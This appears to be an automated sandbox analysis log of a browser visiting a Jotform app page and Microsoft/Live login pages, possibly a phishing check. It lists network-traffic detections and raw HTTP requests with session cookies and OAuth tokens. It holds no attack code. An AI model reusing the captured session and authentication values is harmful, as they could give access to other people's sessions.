Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGhHTTP Parser: No <meta name="author".. found
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: No <meta name="author".. found
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: No <meta name="copyright".. found
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: No <meta name="copyright".. found
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /app/250092704521347 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/8953.c2dbea13.css HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/?family=Circular:400:500:700 HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/index.5048e680.css HTTP/1.1Host: cdn02.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/jotform.css.e448a675.css HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/circular/fonts/Circular-Book.woff2 HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://eu.jotform.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/circular/fonts/Circular-Medium.woff2 HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://eu.jotform.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/pwacompat/2.0.11/pwacompat.min.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/circular/fonts/Circular-Bold.woff2 HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://eu.jotform.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stylebuilder/static/donationBox.css?v=3ff9d3e HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/umd/674ac14411e/for-csa-timeout.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/pwacompat/2.0.11/pwacompat.min.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /actions.js HTTP/1.1Host: js.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/index.f047cc75.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/8953.7f4b13b0.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/?family=Circular HTTP/1.1Host: cdn.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cdn03.jotfor.ms/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /actions.js HTTP/1.1Host: js.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
Source: global trafficHTTP traffic detected: GET /s/umd/674ac14411e/for-csa-timeout.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/8953.7f4b13b0.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/250092704521347/manifest.json HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/index.f047cc75.js HTTP/1.1Host: cdn02.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
